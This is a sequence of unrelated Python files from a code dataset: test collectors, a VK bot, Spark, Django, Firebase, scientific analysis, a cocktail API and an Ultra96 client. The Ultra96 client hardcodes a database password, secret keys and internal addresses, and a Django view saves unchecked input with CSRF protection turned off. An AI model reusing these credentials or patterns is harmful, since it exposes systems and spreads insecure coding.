PerformanceTestRunnerTests(PerformanceTestRunnerBaseClass):\n \"\"\"Collector for the number of performance test transactions.\"\"\"\n\n status_parameter = \"test_result\"\n\n def _parse_source_responses_value(self, responses: Responses) -> Value:\n count = 0\n statuses = self._parameter(self.status_parameter)\n for response in responses:\n count += sum(int(self._soup(response).find(id=status).string) for status in statuses)\n return str(count)\n\n\nclass PerformanceTestRunnerFailedTests(PerformanceTestRunnerTests):\n \"\"\"Collector for the number of failed performance test transactions.\"\"\"\n\n status_parameter = \"failure_type\"\n\n\nclass PerformanceTestRunnerScalability(PerformanceTestRunnerBaseClass):\n \"\"\"Collector for the scalability metric.\"\"\"\n\n def _parse_source_responses_value(self, responses: Responses) -> Value:\n trend_breaks = []\n for response in responses:\n breaking_point = int(self._soup(response).find(id=\"trendbreak_scalability\").string)\n if breaking_point == 100:\n raise AssertionError(\n \"No performance scalability breaking point occurred (breaking 
point is at 100%, expected < 100%)\")\n trend_breaks.append(breaking_point)\n return str(min(trend_breaks))\n","sub_path":"components/collector/src/source_collectors/performancetest_runner.py","file_name":"performancetest_runner.py","file_ext":"py","file_size_in_byte":4642,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"206248895","text":"from dutymanager.files.errors import VK_ERROR, CANT_BIND_CHAT\nfrom dutymanager.units.vk_script import get_chat, msg_edit\nfrom dutymanager.db.methods import AsyncDatabase\nfrom dutymanager.units.vk_script import msg_send\nfrom tortoise.exceptions import BaseORMException\nfrom dutymanager.units.utils import *\nfrom module import VKError, types\nfrom module.utils import logger\nfrom module import Blueprint\n\nbot = Blueprint(name=\"Base\")\ndb = AsyncDatabase.get_current()\n\n\n@bot.event.print_bookmark()\nasync def print_bookmark(event: types.PrintBookmark):\n peer_id = db.chats(event.object.chat)\n local_id = event.object.conversation_message_id\n description = event.object.description\n try:\n await msg_send(\n peer_id,\n f\"🔼 Перейти к закладке «{description}»\",\n local_id\n )\n except (IndexError, VKError) as e:\n e = list(e.args)[0]\n await send_msg(peer_id, VK_ERROR.get(e, \"❗ Произошла неизвестная ошибка.\"))\n\n\n@bot.event.ban_get_reason()\nasync def ban_get_reason(event: types.BanGetReason):\n peer_id = db.chats(event.object.chat)\n local_id = event.object.local_id\n try:\n await msg_send(peer_id, \"🔼 Перейти к месту бана\", local_id)\n except (IndexError, VKError) as e:\n e = list(e.args)[0]\n await send_msg(peer_id, VK_ERROR.get(e, \"❗ Произошла неизвестная ошибка.\"))\n\n\nasync def abstract_bind(\n uid: str, text: str, date: int, local_id: int\n):\n if uid not in db.chats:\n chat_id, title = await get_chat(date, text)\n return await db.chats.create(uid, chat_id, title[:250])\n await msg_edit(\n peer_id=db.chats(uid), local_id=local_id,\n message=f\"✅ Беседа «{db.chats(uid, 'title')}» распознана!\",\n )\n\n\n@bot.event.bind_chat()\nasync def bind_chat(event: types.BindChat):\n return await abstract_bind(\n event.object.chat,\n \"!связать\",\n event.message.date,\n event.message.conversation_message_id\n )\n\n\n@bot.event.subscribe_signals()\nasync def subscribe_signals(event: types.SubscribeSignals):\n uid = event.object.chat\n try:\n await abstract_bind(\n uid,\n event.object.text,\n event.message.date,\n event.message.conversation_message_id\n )\n await db.chats.change(uid, is_duty=True)\n except (BaseORMException, Exception) as e:\n logger.error(e)\n return {\"response\": \"error\", \"error_code\": CANT_BIND_CHAT}","sub_path":"dutymanager/plugins/base_events/base_events.py","file_name":"base_events.py","file_ext":"py","file_size_in_byte":2569,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"193991724","text":"\nnumAxes = 3\ndoubleAxes = True\n#cutoffValues = [1,15,269]\naxisAssignRule = 'degree'\naxisPositRule = 'Gender'\ncolor = 'white'\n\n#edge styling\nedgeColorPalette = ['blue','red']\nedgeColorRule = 'relationship'\n\n#node styling\nnodeColorPalette = ['blue', 'red']\nnodeColorRule = 1\n\n#python scripts/main.py -n /Users/sperez/git/microbPLSA/MicrobProcessor/D3/hiveplots/Data/WL_Nodes_ALL.csv -e /Users/sperez/git/microbPLSA/MicrobProcessor/D3/hiveplots/Data/WL_EDGES_ALL.csv -t aria -d\n\n\n'''\n# Below are variables which would normally be inputer by the user.\n# For the sake of developing the script I have stored them 
here for convenience\n\nnumAxes = 3\ndoubleAxes = False\naxisAssignRule = 2\naxisPositRule = 'degree'\n\ncolor = 'green'\n\n#edge styling\nedgeColorPalette = ['blue', 'purple']\nedgeColorRule = 2 #'average connecting degree'\n\n\n#example command\n#python scripts/main.py -n tests/test_nodes_friends.csv -e tests/test_edges_friends.csv -t friends -d\n'''","sub_path":"tests/test_parameter_friends.py","file_name":"test_parameter_friends.py","file_ext":"py","file_size_in_byte":945,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"566492985","text":"from logging import *\nfrom pyspark.sql import SparkSession\nfrom os.path import abspath\n# warehouse_location points to the default location for managed databases and tables\nwarehouse_location = abspath('spark-warehouse')\nsparkSessionObj = SparkSession \\\n .builder \\\n .appName(\"Python Spark SQL Hive integration example\") \\\n .config(\"spark.sql.warehouse.dir\", warehouse_location) \\\n .enableHiveSupport() \\\n .getOrCreate()\n\nlog =getLogger(\"jobLogger\")\nlog.info(\"Info message\")\nlog.error(\"Error message\")\n\n#sparkSessionObj.sql(\"create database if not exists rakesh\")\n#sparkSessionObj.sql(\"drop database if exists demo\")\nsparkSessionObj.sql(\"show databases\").show()\n#sparkSessionObj.sql(\"use demo\")\n#sparkSessionObj.sql(\"show databases\").show()\n#sparkSessionObj.sql(\"CREATE TABLE IF NOT EXISTS employee(id INT, name STRING, age INT) ROW FORMAT DELIMITED FIELDS TERMINATED BY ',' LINES TERMINATED BY '\\n'\")\n#sparkSessionObj .sql(\"CREATE TABLE src(key INT, value STRING) USING hive\")\n#sparkSessionObj .sql(\"show tables\").show()\n#spark.sql(\"LOAD DATA LOCAL INPATH 'examples/src/main/resources/kv1.txt' INTO TABLE src\")","sub_path":"PySpark/target/scala-2.13/classes/com/pyspark/ConnectToLocalHive.py","file_name":"ConnectToLocalHive.py","file_ext":"py","file_size_in_byte":1125,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"618727056","text":" #!/usr/bin/python\r\n\r\nfrom pymongo import MongoClient\r\nimport cgi\r\nimport json\r\nimport cgitb\r\nimport configparser\r\nfrom django.shortcuts import render\r\nfrom django.http import JsonResponse\r\nfrom django.views.decorators.csrf import csrf_exempt\r\n\r\ncgitb.enable()\r\nconfig = configparser.ConfigParser()\r\nconfig.read('/opt/python/current/app/mwfeeds/mwfeeds.cfg')\r\n\r\ndef index(req):\r\n c = {}\r\n owner = req.session['token']\r\n c[\"token\"] = owner\r\n if owner == \"\" or (\"meltwater.com\" not in owner and \"a3logics.in\" not in owner):\r\n c[\"subView\"] = \"Login.pyv\"\r\n else:\r\n c[\"activeurl\"] = config.get(\"active\", \"baseUrl\")\r\n c[\"subView\"] = \"CreateFeed.pyv\"\r\n return render(req, \"index.pyv\", c, content_type=\"text/html\")\r\n\r\n@csrf_exempt\r\ndef save(req):\r\n try:\r\n raw=req.body.decode(\"utf-8\")\r\n form = json.loads(raw)\r\n req.content_type = \"application/json\"\r\n client = MongoClient(config.get(\"active\", \"DBUrl\"))\r\n db = client.mwfeeds\r\n feedsCollection = db.feeds\r\n feedsCount = feedsCollection.count()\r\n outArray = form\r\n outArray[\"_id\"] = feedsCount\r\n feedsCollection.insert(outArray)\r\n return JsonResponse({\"success\": True, \"id\": feedsCount})\r\n except Exception as e:\r\n return JsonResponse({\"success\": False, \"message\": 
str(e)})\r\n\r\n\r\n\r\n","sub_path":"mwfeeds/controlers/CreateFeed.py","file_name":"CreateFeed.py","file_ext":"py","file_size_in_byte":1351,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"497716694","text":"import strax\nimport straxen\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport pandas as pd\nfrom argparse import ArgumentParser\nimport argparse\nimport sys\nimport time\nimport cutax\n\nsys.path +=['../../../utils/']\n\nimport xomlib\n\n\ndef press_run(runid):\n print(runid)\n sc = straxen.SCADAInterface() \n parameters = {'Pcryo':'XE1T.CRY_PT101_PCHAMBER_AI.PI'}\n st = cutax.xenonnt_online(_rucio_local_path='/project/lgrandi/rucio', include_rucio_local = True)\n st.storage += [strax.DataDirectory('/project2/lgrandi/xenonnt/processed', provide_run_metadata=True)]\n# st = straxen.contexts.xenonnt_online()\n sc.context = st\n run_number = str(runid)\n dfbg = sc.get_scada_values(parameters, run_id= run_number, every_nth_value=1) \n data = dfbg.to_numpy()\n mean = np.mean(data)\n \n xomresult = xomlib.Xomresult(analysis_name=\"test_scada\",\n analysis_version = \"v0.0\",\n variable_name='XE1T.CRY_PT101_PCHAMBER_AI.PI',\n variable_value=mean,\n runid=runid\n )\n xomresult.save()\n time.sleep(20)\n xomresult.xom_message(success=True)\n\n # if(xom_saver(\"test_scada\",'XE1T.CRY_PT101_PCHAMBER_AI.PI',runid,mean, datatype=\"main\")):\n # xom_message(sucess=True)\n # else:\n # xom_message(sucess=False)\n\ndef main():\n parser = argparse.ArgumentParser()\n parser.add_argument(\"runid\",type=int,help='runid')\n args = parser.parse_args()\n print(args.runid)\n parser = ArgumentParser()\n\n press_run(args.runid)\n \nif __name__ == \"__main__\":\n main()\n\n","sub_path":"backend/algorithms/scada/test_scada.py","file_name":"test_scada.py","file_ext":"py","file_size_in_byte":1668,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"101241236","text":"import h5py as h5\nimport numpy as np\nimport pickle as pk\nimport matplotlib.pyplot as plt\nfrom sklearn.externals import joblib\n\nn_sample = 10000\ntop_ratio = 0.8867027097305438\ntop_num = int(n_sample*top_ratio)\neast_num = n_sample-top_num\ntop_flag = [1]*top_num+[0]*east_num\nnp.random.seed(5)\nnp.random.shuffle(top_flag)\ntop_flag = np.array(top_flag)\n\n\n# another way to decide qlx, qly\n# np.sum([len(np.where(start[0:10000, 1]+1e-8 == x)[0])\n# for x in np.arange(0, 451)])\n# np.sum([len(np.where(start[0:10000, 3]+1e-8 == x)[0])\n# for x in np.arange(90, 121, 0.5)])\n# xxx = ([np.where(start[0:10000, 3]+1e-8 == x)[0].tolist()\n# for x in np.arange(90, 121, 0.5)])\n# xxx = [x for y in xxx for x in y]\n# yyy = np.array([0]*10000)\n# yyy[xxx] = 1\n\n\ncase_dir = \"/mnt/e/rtd/Data/Simulation_Data/Output/base/\"\n#case_dir = \"/media/sf_e/rtd/Data/Simulation_Data/Output/smooth/\"\ncase_dir = \"/mnt/e/rtd/Data/Simulation_Data/Output/weekly/\"\n\nnnode = 10\nnrelease = 10000\nnloc = 10000\n\n\n# nnode = 1\n# nrelease = 1000\n# nloc = 10000\n\n\ntravel_time = np.empty(nrelease*nloc)\ntravel_dis = np.empty(nrelease*nloc)\nweight = np.empty(nrelease*nloc)\npt_status = np.empty(nrelease*nloc)\nrelease_time = np.empty(nrelease)\n\nindex_start = 0\nfor inode in range(nnode):\n print(inode)\n # hdf5 = h5.File(case_dir+str(inode)+\"/time.h5\", \"r\")\n # read data\n hdf5 = h5.File(case_dir+str(inode)+\"_time.h5\", \"r\")\n start = hdf5[\"start\"][:]\n end = hdf5[\"end\"][:]\n status = hdf5[\"status\"][:]\n flux = hdf5[\"flux\"][:]\n 
hdf5.close()\n\n # extract time information\n n_subset = len(status)\n index_end = index_start+n_subset\n sub_travel_time = end[:, 0]-start[:, 0]\n sub_travel_dis = ((end[:, 1]-start[:, 1])**2 +\n (end[:, 2]-start[:, 2])**2 +\n (end[:, 3]-start[:, 3])**2)**0.5\n sub_release_time = start[np.arange(0, n_subset, nloc), 0]\n release_material = start[np.arange(nloc), -2]\n release_loc = start[np.arange(nloc), 1:4]\n flux_op = np.transpose(\n np.tile(np.vstack((1-top_flag, top_flag)),\n int(n_subset/nloc)))\n sub_weight = np.sum(flux[:, [0, 2]]*flux_op, 1)\n# sub_weight[sub_weight >= 0] = np.nan\n# sub_weight[status == -3] = np.nan\n# sub_weight[status == -1] = np.nan\n# sub_weight = np.abs(sub_weight)\n\n # put in total array\n travel_time[index_start:index_end] = sub_travel_time\n travel_dis[index_start:index_end] = sub_travel_dis\n pt_status[index_start:index_end] = status\n weight[index_start:index_end] = sub_weight\n release_time[int(index_start/nloc):\n int(index_end/nloc)] = sub_release_time\n index_start = index_end\n\n# remote upwelling particles\ntravel_time = travel_time.reshape((-1, nloc), order=\"C\")\ntravel_dis = travel_dis.reshape((-1, nloc), order=\"C\")\nweight = weight.reshape((-1, nloc), order=\"C\")\npt_status = pt_status.reshape((-1, nloc), order=\"C\")\n\n# travel_time[np.isnan(weight)] = np.nan\n# travel_dis[np.isnan(weight)] = np.nan\n# sort array by release Y directions\n# loc_index = np.argsort(release_loc[:, 1])\n# travel_time = travel_time[:, loc_index]\n# pt_status = pt_status[:, loc_index]\n# weight = weight[:, loc_index]\n# release_material = release_material[loc_index]\n# release_loc = release_loc[loc_index, ]\n\n# form the dict\npk_dict = {\"travel_time\": travel_time,\n \"travel_dis\": travel_dis,\n \"weight\": weight,\n \"status\": pt_status,\n \"release_time\": release_time,\n \"release_loc\": release_loc,\n \"release_material\": release_material\n }\n\n# dump the file\nwith open(case_dir+\"rtd_raw.joblib\", \"wb\") as f:\n joblib.dump(pk_dict, f)\n\n\n# img_dir = \"/media/sf_e/rtd/Figures/\"\n# fig_name = img_dir + \"raw_rtd_contour_combind.png\"\n# fig = plt.figure()\n# ax3 = fig.add_subplot(111)\n# ax3.imshow(np.transpose(\n# np.log10(travel_time/24)),\n# aspect=1,\n# cmap=plt.cm.hot_r)\n# fig.savefig(fig_name, dpi=600, transparent=False)\n# plt.close(fig)\n\n\n# n_active = [len(np.where(~np.isnan(weight[i, :]))[0]) for i in range(nrelease)]\n# img_dir = \"/media/sf_e/rtd/Figures/\"\n# fig_name = img_dir + \"raw_rtd_weight_num.png\"\n# fig = plt.figure()\n# ax3 = fig.add_subplot(111)\n# ax3.scatter(release_time, n_active, s=0.01)\n# fig.savefig(fig_name, dpi=600, transparent=False)\n# plt.close(fig)\n","sub_path":"1.6km/5_statistics/rtd_raw.py","file_name":"rtd_raw.py","file_ext":"py","file_size_in_byte":4324,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"361364029","text":"from django.core.validators import RegexValidator\nfrom django.utils.translation import ugettext_lazy as _\nfrom django.contrib.sites.models import Site\nfrom django.utils.http import urlsafe_base64_encode\nfrom django.utils.encoding import force_bytes\n\n\nclass RegexValidatorCommon(object):\n @staticmethod\n def phone():\n return RegexValidator(r'^[\\+]?[0-9]+$', _('only characters, 0-9'))\n\n\nclass ManagerAccount(object):\n @staticmethod\n def get_url_account_activate(user, token):\n domain = Site.objects.get(name='frontend_account')\n url = \"http://{}/{}/{}\".format(domain, urlsafe_base64_encode(force_bytes(user.pk)), 
token)\n        return url\n\n\nclass General(object):\n    @staticmethod\n    def get_code_number(ind='x'):\n        number = 100\n        return format(id(number), ind)\n\n\n","sub_path":"omni/general_class.py","file_name":"general_class.py","file_ext":"py","file_size_in_byte":810,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"279740693","text":"# -*- coding: utf-8 -*-\nimport os, sys\nimport cv2\nimport random\nimport numpy as np\nfrom tqdm import tqdm\nimport pickle\n\nsys.path.append('../')\nfrom pytorch.common.datasets_parsers.av_parser import AVDBParser\n\nfrom sklearn import svm\nfrom sklearn.ensemble import RandomForestClassifier\nfrom sklearn.ensemble import ExtraTreesClassifier\nfrom sklearn.decomposition import PCA\nfrom accuracy import Accuracy\n\n\ndef get_data(dataset_root, file_list, max_num_clips=0, max_num_samples=50):\n    dataset_parser = AVDBParser(dataset_root, os.path.join(dataset_root, file_list),\n                                max_num_clips=max_num_clips, max_num_samples=max_num_samples,\n                                ungroup=False, load_image=True)\n    data = dataset_parser.get_data()\n    print('clips count:', len(data))\n    print('frames count:', dataset_parser.get_dataset_size())\n    return data\n\ndef calc_features(data):\n    orb = cv2.ORB_create()\n\n    progresser = tqdm(iterable=range(0, len(data)),\n                      desc='calc video features',\n                      total=len(data),\n                      unit='files')\n\n    feat, targets = [], []\n    for i in progresser:\n        clip = data[i]\n\n        # Ways to compute features from an image using keypoints\n        # use the OpenCV library\n        if 0: # distance between landmarks\n            for sample in clip.data_samples:\n                dist = []\n                lm_ref = sample.landmarks[30] # point on the nose\n                for j in range(len(sample.landmarks)):\n                    lm = sample.landmarks[j]\n                    dist.append(np.sqrt((lm_ref[0] - lm[0]) ** 2 + (lm_ref[1] - lm[1]) ** 2))\n                feat.append(dist)\n                targets.append(sample.labels)\n        elif 1: # descriptors of landmarks\n            rm_list = []\n            for sample in clip.data_samples:\n                # make image border\n                bordersize = 15\n                border = cv2.copyMakeBorder(sample.image, top=bordersize, bottom=bordersize, left=bordersize, right=bordersize,\n                                            borderType=cv2.BORDER_CONSTANT, value=[0]*3)\n\n                # make keypoint list\n                keypoints = []\n                for k in range(18, 68):\n                    keypoints.append(cv2.KeyPoint(x=sample.landmarks[k][0]+bordersize,\n                                                  y=sample.landmarks[k][1]+bordersize,\n                                                  _size=128))\n\n                # compute the descriptors with ORB\n                keypoints_actual, descriptors = orb.compute(border, keypoints)\n                if len(keypoints_actual) != len(keypoints):\n                    rm_list.append(sample)\n                    continue\n\n                descriptors = np.concatenate(descriptors)\n                feat.append(descriptors)\n                targets.append(sample.labels)\n\n            for sample in rm_list:\n                clip.data_samples.remove(sample)\n        else:\n            rm_list = []\n            for j in range(len(clip.data_samples)):\n                VolData = []\n                target_blob = []\n                bordersize = 25\n                for k in range(-2, 3):\n                    t = min(max(0, j+k), len(clip.data_samples)-1)\n                    gray_img = cv2.cvtColor(clip.data_samples[t].image, cv2.COLOR_BGR2GRAY)\n                    # make image border\n                    gray_img = cv2.copyMakeBorder(gray_img, top=bordersize, bottom=bordersize, left=bordersize,\n                                                  right=bordersize,\n                                                  borderType=cv2.BORDER_CONSTANT, value=[0] * 3)\n                    VolData.append(gray_img)\n                    target_blob.append(clip.data_samples[t].labels)\n                try:\n                    feat.append(get_LBPTOP(np.asarray(VolData).transpose(1,2,0), clip.data_samples[j].landmarks[18:68], bordersize))\n                    targets.append(np.median(target_blob))\n                except:\n                    rm_list.append(clip.data_samples[j])\n\n            for sample in rm_list:\n                clip.data_samples.remove(sample)\n\n    print('feat count:', 
len(feat))\n    return np.asarray(feat, dtype=np.float32), np.asarray(targets, dtype=np.float32)\n\ndef classification(X_train, X_test, y_train, y_test, accuracy_fn, pca_dim):\n    if pca_dim > 0:\n        pass\n        # TODO: reduce the feature dimensionality using PCA\n\n    # shuffle\n    combined = list(zip(X_train, y_train))\n    #random.shuffle(combined)\n    X_train[:], y_train[:] = zip(*combined)\n\n    # Classifiers from sklearn\n    classifiers = []\n    classifiers.append(RandomForestClassifier(n_estimators=150, max_depth=50))\n    #classifiers.append(svm.SVC(kernel='linear', gamma=5.0, C=150))\n\n    for clf in classifiers:\n        print(clf)\n        y_pred = clf.fit(X_train, y_train).predict(X_test)\n        accuracy_fn.by_frames(y_pred)\n        accuracy_fn.by_clips(y_pred)\n\n\nif __name__ == \"__main__\":\n    experiment_name = 'exp_1'\n    max_num_clips = 0 # load only part of the data when debugging the code\n    use_dump = False # use a dump for fast loading of precomputed features from file\n\n    # dataset dir\n    base_dir = '/media/olga/Data/Yandex_Disk/school_ML/DATABASES'\n    if 1:\n        train_dataset_root = base_dir + '/Ryerson/Video'\n        train_file_list = base_dir + '/Ryerson/train_data_with_landmarks.txt'\n        test_dataset_root = base_dir + '/Ryerson/Video'\n        test_file_list = base_dir + '/Ryerson/test_data_with_landmarks.txt'\n    elif 1:\n        train_dataset_root = base_dir + '/OMGEmotionChallenge-master/omg_TrainVideos/preproc/frames'\n        train_file_list = base_dir + '/OMGEmotionChallenge-master/omg_TrainVideos/preproc/train_data_with_landmarks.txt'\n        test_dataset_root = base_dir + '/OMGEmotionChallenge-master/omg_ValidVideos/preproc/frames'\n        test_file_list = base_dir + '/OMGEmotionChallenge-master/omg_ValidVideos/preproc/valid_data_with_landmarks.txt'\n\n    if not use_dump:\n        # load dataset\n        train_data = get_data(train_dataset_root, train_file_list, max_num_clips=0)\n        test_data = get_data(test_dataset_root, test_file_list, max_num_clips=0)\n\n        # get features\n        train_feat, train_targets = calc_features(train_data)\n        test_feat, test_targets = calc_features(test_data)\n\n        accuracy_fn = Accuracy(test_data, experiment_name=experiment_name)\n\n        #with open(experiment_name + '.pickle', 'wb') as f:\n        #    pickle.dump([train_feat, train_targets, test_feat, test_targets, accuracy_fn], f, protocol=2)\n    else:\n        with open(experiment_name + '.pickle', 'rb') as f:\n            train_feat, train_targets, test_feat, test_targets, accuracy_fn = pickle.load(f)\n\n    # run classifiers\n    classification(train_feat, test_feat, train_targets, test_targets, accuracy_fn=accuracy_fn, pca_dim=100)","sub_path":"video_feature_classification/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":7190,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"104017077","text":"import pandas as pd\r\nimport firebase_admin\r\nfrom firebase_admin import credentials\r\nfrom firebase_admin import firestore\r\n# the path is where the Json key file is stored\r\ncred = credentials.Certificate(\"D:/ETTT/ICRSS/serviceAccountKey.json\")\r\n# initialize means to set the app up\r\nif (not len(firebase_admin._apps)):\r\n    firebase_admin.initialize_app(cred)\r\n'''\r\n Initialize firebase; note that it cannot be initialized twice\r\n Initialize firestore \r\n'''\r\ndb = firestore.client()\r\n# ranks is a collection; the entries under it are called documents, stored in the variable collection_name\r\n\r\nranks_list=[]\r\ncol_list=[]\r\nuid_list=[]\r\n# path_2 is the name of the documents to fetch\r\n# here it refers to the documents under ranks\r\npath_2 =\"ranks\"\r\n# db.collection(name) fetches the contents of ranks and stores them in the variable collection_ref\r\n# the .stream() method is similar to .get(); it retrieves the data from collection_ref\r\ncollection_ref = db.collection(path_2)\r\ndocs = collection_ref.stream()\r\ntry:\r\n    for doc in 
docs:\r\n        ranks_list.append(doc.to_dict())\r\n        uid_list.append(doc.to_dict()[\"uid\"])\r\nexcept:\r\n    print(\"The specified document path {} does not exist, please check that the path is correct\".format(path_2)) \r\nfor i in ranks_list:\r\n# since store and item are kept separately, join them together first and then append to col_list\r\n    col_list.append(i.get('store')+'|'+i.get('item')) \r\n# pd.unique() removes duplicate values, since one user can rate multiple items\r\nuid_uni =pd.unique(pd.Series(uid_list))\r\ncol_uni =pd.unique(pd.Series(col_list))\r\n# create a new DataFrame called rating_df and set the row and column names\r\nrating_df=pd.DataFrame(columns=uid_uni,index=col_uni)\r\n# here i again stands for each dict\r\nfor i in ranks_list:\r\n    store_item=i.get('store')+'|'+i.get('item')\r\n    rating_df[i['uid']][store_item]=i['rank']\r\nrating_df.to_csv('get_firestore_rating.csv',encoding=\"utf_8_sig\")","sub_path":"get_firsebase_to_csv.py","file_name":"get_firsebase_to_csv.py","file_ext":"py","file_size_in_byte":1806,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"497353654","text":"import json, requests\nfrom PIL import Image\nimport matplotlib.pyplot as plt\n\n# api functions to provide information from www.thecocktaildb.com \n# base url for the cocktail api\nURL_BASE = \"https://www.thecocktaildb.com/api/json/v1/1/\"\nSEARCH = r\"search.php?s=\"\n\ndef get_json_response(url):\n    # use base url and additional url arguments provided\n    response = requests.get(URL_BASE + url)\n    if response.status_code == 200:\n        response_json = json.loads(response.content)\n        if response_json:\n            # if the response is good, return the json as a dict object\n            return response_json\n        else:\n            return False\n    else:\n        return False\n\ndef show_cocktail(cocktail_json):\n    # get image of drink from api and use matplotlib to show it\n    response = requests.get(cocktail_json[\"drinks\"][0][\"strDrinkThumb\"], stream=True)\n    img = Image.open(response.raw)\n    plt.imshow(img)\n    plt.show()\n\ndef define(search):\n    replys = []\n    # search the api for the given cocktail\n    define_url = SEARCH + search\n    response = get_json_response(define_url)\n    if response != False:\n        # show the cocktail image if a response is given\n        show_cocktail(response)\n        replys.append(\"Here is a {}!\".format(search))\n    else:\n        replys.append(\"I can't find {}\".format(search))\n\n    return replys\n\ndef recipe(search):\n    replys = []\n    # gets the recipe for the given cocktail\n    recipe_url = SEARCH + search\n    response = get_json_response(recipe_url)\n    if response != False:\n        replys.append(response[\"drinks\"][0][\"strInstructions\"])\n    else:\n        replys.append(\"I can't find {}\".format(search))\n\n    return replys\n\ndef glass(search):\n    replys = []\n    # gets the glass for the given cocktail\n    glass_url = SEARCH + search\n    response = get_json_response(glass_url)\n    if response != False:\n        replys.append(response[\"drinks\"][0][\"strGlass\"])\n    else:\n        replys.append(\"Sorry I cant find the glass used for {}\".format(search))\n\n    return replys\n\ndef ingredients(search):\n    replys = []\n    ingredients_url = SEARCH + search\n    response = get_json_response(ingredients_url)\n    if response != False:\n        drink = response[\"drinks\"][0]\n        # lists of all ingredients \n        ingredients = []\n        ingredients.append(drink[\"strIngredient1\"])\n        ingredients.append(drink[\"strIngredient2\"])\n        ingredients.append(drink[\"strIngredient3\"])\n        ingredients.append(drink[\"strIngredient4\"])\n        ingredients.append(drink[\"strIngredient5\"])\n        ingredients.append(drink[\"strIngredient6\"])\n        ingredients.append(drink[\"strIngredient7\"])\n        ingredients.append(drink[\"strIngredient8\"])\n        # lists of all ingredients measures\n        ingredient_measures = []\n        
ingredient_measures.append(drink[\"strMeasure1\"])\n ingredient_measures.append(drink[\"strMeasure2\"])\n ingredient_measures.append(drink[\"strMeasure3\"])\n ingredient_measures.append(drink[\"strMeasure4\"])\n ingredient_measures.append(drink[\"strMeasure5\"])\n ingredient_measures.append(drink[\"strMeasure6\"])\n ingredient_measures.append(drink[\"strMeasure7\"])\n ingredient_measures.append(drink[\"strMeasure8\"])\n # iterate the ingredients\n for x in range(8):\n # if ingredient is present, print it\n if ingredients[x] != None:\n # some ingredient have a measure, some are un measured\n if ingredient_measures[x] != None:\n replys.append(ingredient_measures[x] + ingredients[x])\n else:\n replys.append(ingredients[x])\n else:\n replys.append(\"Can't find the ingredients for {}\".format(search))\n\n return replys\n\ndef random():\n # use random api for to get random cocktail\n replys = []\n rand_url = r\"random.php\"\n response = get_json_response(rand_url)\n if response != False:\n replys.append(\"I reccomend a \" + response[\"drinks\"][0][\"strDrink\"] + \" , Here is a picture!\")\n show_cocktail(response)\n else:\n replys.append(\"Sorry I cant find a random cocktail!\")\n\n return replys\n","sub_path":"api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":4168,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"568508109","text":"import sys\nimport socket\nimport threading\nimport random\nimport base64\nimport time\nfrom math import floor\nfrom Crypto.Cipher import AES\nfrom Crypto import Random\nfrom threading import Thread\nfrom queue import Queue\nfrom collections import deque\nfrom features_fpga import get_features\nfrom MLP_predict_fpga import MLP_predict\nfrom MLP_predict_fpga import MLP_start\n\n# imports for SQL\nimport mysql.connector\nimport sshtunnel\nimport pymysql\nimport paramiko\nimport pandas as pd\nfrom paramiko import SSHClient\nfrom sshtunnel import SSHTunnelForwarder\nfrom os.path import expanduser\n\n### this runs on the ultra96 and connects to the eval_server\n\nGROUP_ID = 18\nSECRET_KEY = \"abcdefghijklmnop\"\nLAPTOP_ULTRA96_SECRET_KEY = \"abcdefghijklmnop\"\n\nDUMMY_DATA = ['zigzag', 'rocket', 'hair', 'logout']\n\n# create a socket connection to each of the dancer's laptops\nLAPTOP_IP = ['192.168.1.73'] \nMAX_LAPTOP_CONNECTIONS = 12; #3\nBLUNO_PER_LAPTOP = 1;\n\nPREDICTION_MAP = {\n 0 : \"hair\",\n 1 : \"rocket\",\n 2 : \"zigzag\",\n 3 : \"No move\"\n}\n\nPREDICTION_MAP_SQL = {\n 0 : \"HAIR\",\n 1 : \"ROCKET\",\n 2 : \"ZIGZAG\",\n 3 : \"NO MOVE\",\n 4 : \"WINDOWS\",\n 5 : \"PUSHBACK\",\n 6 : \"ELBOW_LOCK\",\n 7 : \"SCARECROW\",\n 8 : \"SHOULDER_SHRUG\"\n}\nPREDICTION_COUNT = {\n 0 : 0,\n 1 : 0,\n 2 : 0,\n 3 : 0\n}\n\nPREDICTION_THRESHOLD = 10 # once this many same predictions are made, sent to eval server\n'''\nSet this to True when attempting to connect to evaluation server\n'''\nCONNECT_TO_EVAL_SERVER = False\n\n'''\nSet this to True if you want to send data to sql database\n'''\nCONNECT_TO_SQL_DATABASE = False\n\n'''\nConnection to SQL Database\n'''\nsql_hostname = 'localhost'\nsql_username = 'capstone'\nsql_password = 'CG4002Weiyang1997!'\nsql_main_database = 'CG4002'\nsql_port = 3306\nssh_host = 'little_peter'\n\nssh_user = 'little-peter'\nssh_port = 22\nsql_ip = 'localhost'\nssh_address = '172.25.107.67'\nWEI_YANG_IP = '172.25.100.23'\n\nFILE_WRITE_START_TIME = 0\nFILE_WRITE_END_TIME = 0\nDATA_COLLECTION_MODE = False\n\n\nclass Ultra96_client(Thread):\n def __init__(self, ip_addr, port_num):\n 
